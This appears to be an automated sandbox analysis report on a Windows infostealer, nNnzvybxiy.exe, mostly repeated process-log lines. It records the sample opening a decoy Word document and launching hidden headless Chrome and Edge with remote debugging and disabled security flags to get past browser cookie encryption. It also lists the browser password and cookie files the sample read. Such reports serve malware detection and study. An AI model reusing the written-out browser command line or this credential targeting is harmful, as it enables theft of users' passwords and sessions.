      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeMemory allocated: 1DBED990000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C79BE70 GetSystemInfo,0_2_00007FFB0C79BE70
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3microsoft-hyper-v-drivers-migration-replacement.man@P
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
      Source: nNnzvybxiy.exe, 00000000.00000002.1572824125.000001DBEDA14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: +microsoft-hyper-v-migration-replacement.man@P
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 2microsoft-hyper-v-client-migration-replacement.man@P
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7C9AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFB0C7C9AC0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7C9AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFB0C7C9AC0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7BB728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FFB0C7BB728
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9764 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""Jump to behavior

      Language, Device and Operating System Detection

      barindex
      Yara detected Telegram Recon
      Source: Yara matchFile source: nNnzvybxiy.exe, type: SAMPLE
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7BBFF0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FFB0C7BBFF0

      Stealing of Sensitive Information

      barindex
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shmJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-walJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeDirectory queried: C:\Users\Public\Documents\638724340890071225\FilesJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeDirectory queried: C:\Users\Public\Documents\638724340890071225\Files\DJump to behavior
      Source: Yara matchFile source: Process Memory Space: nNnzvybxiy.exe PID: 5472, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Attempt to bypass Chrome Application-Bound Encryption
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading      		11
      Process Injection      		11
      Masquerading      		1
      OS Credential Dumping      		1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Query Registry      		Remote Desktop Protocol11
      Data from Local System      		1
      Remote Access Software      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager11
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets1
      Process Discovery      		SSHKeylogging3
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials11
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync4
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      nNnzvybxiy.exe3%ReversingLabs
      nNnzvybxiy.exe1%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\Desktop\e_sqlite3.dll0%ReversingLabs
